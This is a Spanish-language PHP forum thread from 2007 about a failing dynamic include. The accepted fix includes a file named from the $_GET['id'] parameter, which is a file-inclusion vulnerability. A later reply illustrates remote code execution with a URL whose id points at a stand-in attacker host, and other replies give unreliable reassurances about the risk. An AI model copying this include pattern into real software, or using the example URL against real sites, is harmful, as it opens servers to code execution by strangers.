Foros del Web » Programando para Internet » PHP »

Error <?php include ("$id.php4") ?>

Estas en el tema de Error <?php include ("$id.php4") ?> en el foro de PHP en Foros del Web. Buenas! Que tengo un problema con el include <?php include ("$id.php4") ?>. Y es que mi conocimiento del codigo php es más bien nulo (diseño ...
  #1 (permalink)  
Antiguo 14/12/2007, 16:10
 
Fecha de Ingreso: diciembre-2007
Mensajes: 7
Antigüedad: 16 años, 4 meses
Puntos: 0
Error <?php include ("$id.php4") ?>

Buenas!
Que tengo un problema con el include <?php include ("$id.php4") ?>. Y es que mi conocimiento del codigo php es más bien nulo (diseño más que nada) y a la hora de hacer las webs utilizaba esté codigo y siempre me fue bien para hacer diseños más dinámicos. Pero no se porque, ahora me da este error, cuando hasta hace poco me funcionaba. Y que estoy desesperado, porque me urge publicar la web y no se como solucionarlo.

Warning: include($.php4) [function.include]: failed to open stream: No such file or directory in /www/sites/1/iespana.es/a/g/agrokae/site/kae.php on line 592

Warning: include() [function.include]: Failed opening '$.php4' for inclusion (include_path='.:/www/usr/lib/php') in /www/sites/1/iespana.es/a/g/agrokae/site/kae.php on line 592


Gracias
  #2 (permalink)  
Antiguo 14/12/2007, 17:33
Avatar de mauled  
Fecha de Ingreso: marzo-2005
Ubicación: Cd. de México.
Mensajes: 3.001
Antigüedad: 19 años, 1 mes
Puntos: 33
Re: Error <?php include ("$id.php4") ?>

Seria bueno que postearas el código que estas usando para los include's

Saludillos.

PD. Bienvenido al foro!
  #3 (permalink)  
Antiguo 14/12/2007, 18:01
Avatar de oso96_2000  
Fecha de Ingreso: junio-2002
Ubicación: Distrito Federal
Mensajes: 558
Antigüedad: 21 años, 10 meses
Puntos: 35
Re: Error <?php include ("$id.php4") ?>

Simple, no encuentra el archivo que estas tratando de incluir o.o.. segun lo que se ve en el error, se trata de incluir un archivo llamado $.php4 ¿por que? ni idea, revisa bien tu codigo y la forma en que pides las variables..

Saludos
__________________
Sin Ideas
  #4 (permalink)  
Antiguo 14/12/2007, 18:14
Avatar de pato12  
Fecha de Ingreso: septiembre-2007
Ubicación: Salta
Mensajes: 1.620
Antigüedad: 16 años, 6 meses
Puntos: 101
Re: Error <?php include ("$id.php4") ?>

y si le pones ; despues del include
haci:

<?php include ("$id.php4"); ?>

o el archivo no se encuentra donde dice.
o prueba con este otro:

<?php include ("\$id.php4"); ?>

suerte
salu2
__________________
Half Music - www.halfmusic.com
  #5 (permalink)  
Antiguo 14/12/2007, 18:20
 
Fecha de Ingreso: diciembre-2007
Mensajes: 7
Antigüedad: 16 años, 4 meses
Puntos: 0
Re: Error <?php include ("$id.php4") ?>

Lo que pongo es: <?php include ("$id.php4") ?>

Que siempre me sirvió para hacer que se que cargasen las páginas con esta extensión dentro del diseño de la web, xo ahora no se porque no me deja

Pato12, poniendole las comillas me sale:

Warning: include(.php4) [function.include]: failed to open stream: No such file or directory in /www/sites/1/iespana.es/a/g/agrokae/site/ka.php on line 592

Warning: include() [function.include]: Failed opening '.php4' for inclusion (include_path='.:/www/usr/lib/php') in /www/sites/1/iespana.es/a/g/agrokae/site/ka.php on line 592


y con las barra y comillas

Warning: include($id.php4) [function.include]: failed to open stream: No such file or directory in /www/sites/1/iespana.es/a/g/agrokae/site/eak.php on line 592

Warning: include() [function.include]: Failed opening '$id.php4' for inclusion (include_path='.:/www/usr/lib/php') in /www/sites/1/iespana.es/a/g/agrokae/site/eak.php on line 592

Última edición por Inculto; 14/12/2007 a las 18:32
  #6 (permalink)  
Antiguo 14/12/2007, 18:33
Avatar de pato12  
Fecha de Ingreso: septiembre-2007
Ubicación: Salta
Mensajes: 1.620
Antigüedad: 16 años, 6 meses
Puntos: 101
Re: Error <?php include ("$id.php4") ?>

figate bien en tus otras pagina si el codigo esta bien.
si esta bien es que tu hosting (creo q es iespana.es) no cambio el modo de hospedage web.
__________________
Half Music - www.halfmusic.com
  #7 (permalink)  
Antiguo 14/12/2007, 18:48
 
Fecha de Ingreso: diciembre-2007
Mensajes: 7
Antigüedad: 16 años, 4 meses
Puntos: 0
Re: Error <?php include ("$id.php4") ?>

Perdon por mi ignorancia, pero ¿que codigo le he de poner a la pagina que se ha de cargar? Hay que ponerle algun código en especial? (nunca me hizo falta) o con la extensión .php4 ya debería cargarse?

No sé es muy raro esto, ya que el de iespana.es lo uso de pruebas, ya que el servidor en el que tengo la web, tampoco se carga, solo que allá no me muestra los mensajes de error.
Y lo que más me saca de quicio, es que cuando empece con la web a hacer pruebas hace unos meses sí se me cargaba

Última edición por Inculto; 14/12/2007 a las 19:07
  #8 (permalink)  
Antiguo 14/12/2007, 19:16
 
Fecha de Ingreso: junio-2007
Ubicación: por ahi
Mensajes: 262
Antigüedad: 16 años, 9 meses
Puntos: 4
Re: Error <?php include ("$id.php4") ?>

donde esta definido $id

Si no esta definido no Funcionara nunca
  #9 (permalink)  
Antiguo 14/12/2007, 21:25
Avatar de dopon  
Fecha de Ingreso: julio-2005
Ubicación: Cucuta / Colombia
Mensajes: 493
Antigüedad: 18 años, 9 meses
Puntos: 1
Re: Error <?php include ("$id.php4") ?>

Si la intucion no me falla debes estar recibiendo el id por parametro URL pues lo haces para hacer un include dinamico si es asi deberias hacer algo como
Código PHP:
<?php include ($_GET['id'].".php4"?>
ademas prueba con

Código PHP:
<?php include ($id.".php4"?>
  #10 (permalink)  
Antiguo 15/12/2007, 03:49
 
Fecha de Ingreso: diciembre-2007
Mensajes: 7
Antigüedad: 16 años, 4 meses
Puntos: 0
Re: Error <?php include ("$id.php4") ?>

Aupa!!

Al final con el codigo <?php include ($_GET['id'].".php4") ?> sí se me carga.
Gracias a todos por la ayuda.
Y dopon, buena intuicion

Y una preguntilla, por donde puedo empezar para empezar a ir aprendiendo a programar en php poco a poco

Gracias

Última edición por Inculto; 15/12/2007 a las 04:19
  #11 (permalink)  
Antiguo 15/12/2007, 03:53
 
Fecha de Ingreso: diciembre-2007
Mensajes: 4
Antigüedad: 16 años, 4 meses
Puntos: 0
Re: Error <?php include ("$id.php4") ?>

cuidado con hacer un include directo de una $_GET. alguien podría ejecutar codigo de manera remota.
  #12 (permalink)  
Antiguo 15/12/2007, 04:15
 
Fecha de Ingreso: diciembre-2007
Mensajes: 7
Antigüedad: 16 años, 4 meses
Puntos: 0
Re: Error <?php include ("$id.php4") ?>

aue implica ejecutar un codigo de manera remota?
  #13 (permalink)  
Antiguo 15/12/2007, 04:34
Avatar de damargon  
Fecha de Ingreso: junio-2003
Ubicación: Madrid
Mensajes: 386
Antigüedad: 20 años, 10 meses
Puntos: 3
Re: Error <?php include ("$id.php4") ?>

Implica que si yo escribo en mi navegador:
'http://www.tudominio.com/kae.php?id=http://www.midominio.com/miCodigo'

Estaría ejecutando en tu servidor el archivo miCodigo.php4 creado por mí y ubicado en cualquier sitio. Podría crear archivos, eliminar, modificar... en fin, muchas cosas.

Aunque no tengo muy claro si se puede hacer includes remotos así de forma tan facilona.
  #14 (permalink)  
Antiguo 15/12/2007, 07:18
 
Fecha de Ingreso: diciembre-2007
Mensajes: 7
Antigüedad: 16 años, 4 meses
Puntos: 0
Re: Error <?php include ("$id.php4") ?>

Ok. gracias x la informacion.
  #15 (permalink)  
Antiguo 15/12/2007, 07:49
Avatar de dopon  
Fecha de Ingreso: julio-2005
Ubicación: Cucuta / Colombia
Mensajes: 493
Antigüedad: 18 años, 9 meses
Puntos: 1
Re: Error <?php include ("$id.php4") ?>

el codigo incluido si es php y el servidor remoto interpreta php no seria peligroso dado que lo que incluye es el volcado al navegador del script, ya no se que pasa si s eincluye un archivo phps o inc o plano, creo que ahi si tendriamos problemas
  #16 (permalink)  
Antiguo 15/12/2007, 10:38
 
Fecha de Ingreso: mayo-2006
Mensajes: 288
Antigüedad: 17 años, 10 meses
Puntos: 4
Re: Error <?php include ("$id.php4") ?>

para eso en ves de usar include solo usen fopen
;)
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 06:05.